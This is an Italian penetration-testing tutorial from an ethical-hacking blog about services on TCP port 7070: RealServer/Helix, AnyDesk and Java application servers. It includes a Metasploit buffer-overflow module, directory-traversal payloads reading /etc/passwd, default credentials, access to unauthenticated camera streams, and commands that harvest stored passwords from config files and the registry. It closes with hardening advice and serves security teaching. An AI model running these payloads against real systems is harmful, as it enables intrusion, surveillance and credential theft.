Porta 7070 Pentest: RealServer, Helix e AnyDesk
Port 7070 aperta? Guida pentest 2026: cos'è, enumerazione Helix/RealServer, exploit RTSP, directory traversal, AnyDesk e Java app server.
- Pubblicato il 2026-04-16
- Tempo di lettura: 4 min
La porta 7070 TCP è storicamente associata a RealServer (poi rinominato Helix Universal Server), la piattaforma di streaming media di RealNetworks che ha dominato gli anni 2000 — quella dei file .rm e .ram che facevano buffering eterno sulla connessione 56k. Se sei abbastanza giovane da non ricordarlo, immagina un antenato di YouTube che richiedeva un player dedicato e un server specifico per distribuire audio e video. Nel 2026 RealServer è praticamente estinto, ma la porta 7070 non lo è: oggi viene comunemente riutilizzata da AnyDesk (remote desktop), Kubernetes Dashboard (in alcune configurazioni), web application server di sviluppo (Jetty, WildFly in porta alternativa) e vari servizi interni. Trovare la 7070 aperta durante un pentest richiede prima di tutto capire cosa ci gira effettivamente sopra — e poi agire di conseguenza.
Questo articolo copre sia lo scenario legacy (RealServer/Helix — ancora presente in infrastrutture media, broadcast e IPTV) sia le alternative moderne, perché nel pentest reale la porta che trovi aperta non è sempre quella che ti aspetti.
1. Identificare il Servizio #
La prima cosa da fare con la porta 7070 è capire cosa sta rispondendo. Non dare per scontato che sia RealServer.
Nmap #
nmap -sV -p 7070 10.10.10.40PORT STATE SERVICE VERSION
7070/tcp open realserver?
# oppure
7070/tcp open http Jetty 9.4.44
# oppure
7070/tcp open ssl/http AnyDeskBanner grab #
curl -s http://10.10.10.40:7070/ -I| Risposta | Servizio probabile |
|---|---|
Server: Helix o RealServer | RealServer / Helix |
Server: Jetty, WildFly, Tomcat | Java app server |
| No header standard, connessione binaria | AnyDesk o protocollo proprietario |
| Dashboard HTML con “Kubernetes” | K8s Dashboard (tratta come porta 6443) |
| JSON API | Servizio custom — enumera endpoint |
# Prova anche RTSP (il protocollo nativo di RealServer)
nc -nv 10.10.10.40 7070
# Invia una richiesta RTSP
# OPTIONS rtsp://10.10.10.40:7070/ RTSP/1.0
# CSeq: 1Se risponde con RTSP/1.0 200 OK → è davvero un server di streaming.
2. Scenario Legacy: RealServer / Helix Universal Server #
Cos’è RealServer #
RealNetworks ha sviluppato RealServer (poi Helix) per lo streaming di contenuti multimediali: radio online, TV in diretta, video on demand. Usava il protocollo proprietario RTSP (Real Time Streaming Protocol) e i formati RealMedia (.rm, .rv, .ra). Ha avuto il suo picco tra il 1998 e il 2008, quando Flash e poi HTML5 lo hanno reso obsoleto.
Oggi Helix Server sopravvive in nicchie specifiche: emittenti radio/TV che non hanno mai migrato, sistemi IPTV in hotel e ospedali, reti di sorveglianza legacy e ambienti broadcast professionali.
Enumerazione #
# Versione dal banner HTTP
curl -s http://10.10.10.40:7070/ -IHTTP/1.0 200 OK
Server: Helix Server Version 15.0.0.0 (linux-2.6-i386)# Admin console (porta separata, spesso 7071)
curl -s http://10.10.10.40:7071/admin/Default credentials Helix #
| Username | Password | Interfaccia |
|---|---|---|
admin | admin | Admin console |
admin | (vuota) | Alcune versioni |
CVE di RealServer/Helix #
searchsploit realserver
searchsploit helix server
searchsploit helix universalHelix Server - Remote Code Execution
RealServer 7-9 - Describe Buffer Overflow (SEH)
Helix Server 14.x - RTSP DESCRIBE Buffer Overflow
RealServer 8 - Remote Root ExploitLe CVE principali riguardano:
Buffer overflow RTSP DESCRIBE — una richiesta RTSP con URL molto lungo causa overflow:
# Metasploit
use exploit/multi/realserver/describe
set RHOSTS 10.10.10.40
set RPORT 7070
runDirectory traversal — accesso a file fuori dalla directory dei contenuti:
curl -s "http://10.10.10.40:7070/..%5c..%5c..%5c..%5c/etc/passwd"
curl -s "http://10.10.10.40:7070/..%252f..%252f..%252f..%252fetc/passwd"Information disclosure — la pagina di stato espone configurazione e path:
curl -s http://10.10.10.40:7070/viewsource/template.htmlRTSP exploitation #
# Enumera stream disponibili
nmap -p 7070 --script=rtsp-methods,rtsp-url-brute 10.10.10.40# Connettiti a uno stream
vlc rtsp://10.10.10.40:7070/live/stream1
# Oppure
ffplay rtsp://10.10.10.40:7070/live/stream1Se lo stream non richiede autenticazione → accesso diretto ai contenuti video/audio. In contesti di sorveglianza, questo significa vedere le telecamere.
3. Scenario Moderno: AnyDesk sulla 7070 #
AnyDesk è un software di remote desktop che usa la porta 7070 TCP per le connessioni. Se Nmap identifica AnyDesk:
# AnyDesk esposto senza password
# Tenta la connessione con il client AnyDesk
anydesk 10.10.10.40Se AnyDesk è configurato con password fissa (unattended access) anziché richiedere approvazione interattiva:
# Brute force non è pratico (rate limiting pesante)
# Cerca la password in file di configurazione su macchine già compromesse
find / -path "*/AnyDesk/*" -name "*.conf" 2>/dev/null
cat /root/.anydesk/system.conf | grep passwordLa password di AnyDesk salvata nel registro Windows:
reg query "HKLM\SOFTWARE\WOW6432Node\AnyDesk" /s4. Scenario Moderno: Java App Server sulla 7070 #
Se un Jetty, WildFly o altro Java server ascolta sulla 7070:
# Identifica il framework
curl -s http://10.10.10.40:7070/ -I | grep -i server
# Directory bruteforce
gobuster dir -u http://10.10.10.40:7070 -w /usr/share/wordlists/dirb/common.txt
# Cerca console di management
curl -s http://10.10.10.40:7070/jolokia/
curl -s http://10.10.10.40:7070/actuator/
curl -s http://10.10.10.40:7070/manager/Se trovi Jolokia (JMX over HTTP) → possibile RCE via MBean. Se trovi Spring Actuator → information disclosure e potenziale RCE. Se trovi una console di management → credenziali default del framework specifico.
5. Post-Exploitation #
Da RealServer shell #
Se ottieni una shell da un exploit RealServer, gira tipicamente come utente real o helix:
id
# uid=500(real) gid=500(real) groups=500(real)
# Configurazione con credenziali
find / -name "*.cfg" -path "*/helix/*" -exec grep -liE "password|AdminPassword" {} \;
cat /opt/helix/Server/rmserver.cfg | grep -i passwordLa configurazione di Helix contiene password per l’admin console e a volte credenziali per backend storage e CDN.
Per l’escalation: Linux Privilege Escalation.
Da app server Java #
Variabili d’ambiente, file di configurazione e datasource JDBC — stessi pattern di WebLogic e Tomcat.
6. Detection & Hardening #
- Se RealServer è legacy, migra — Helix non riceve più aggiornamenti di sicurezza
- Se devi mantenerlo: isola in una VLAN dedicata, firewall la 7070 solo per i client legittimi
- Autenticazione sugli stream — non lasciare stream RTSP aperti
- Admin console su porta separata, non esposta, con credenziali forti
- AnyDesk: password complessa per unattended access, whitelist IP, disabilita se non necessario
- App server Java: stesse best practice di qualsiasi web application — patch, auth, WAF, no console esposta
- Monitora connessioni sulla 7070 da IP inattesi
7. Cheat Sheet Finale #
| Azione | Comando |
|---|---|
| Nmap | nmap -sV -p 7070 target |
| Banner | curl -s http://target:7070/ -I |
| RTSP test | nmap -p 7070 --script=rtsp-methods target |
| Stream access | vlc rtsp://target:7070/live/stream1 |
| Helix admin | curl -s http://target:7071/admin/ |
| Dir traversal | curl -s "http://target:7070/..%5c..%5c/etc/passwd" |
| Searchsploit | searchsploit realserver helix |
| MSF exploit | use exploit/multi/realserver/describe |
| Jolokia | curl -s http://target:7070/jolokia/ |
| Actuator | curl -s http://target:7070/actuator/ |
| Gobuster | gobuster dir -u http://target:7070 -w wordlist |
Riferimento: RealNetworks Helix documentation, RTSP Protocol RFC 2326, HackTricks media servers. Uso esclusivo in ambienti autorizzati.
Credi nel progetto HackIta? Aiutaci a restare il riferimento dell’hacking etico italiano con una donazione. Per aziende che vogliono testare la propria sicurezza: penetration test professionale.
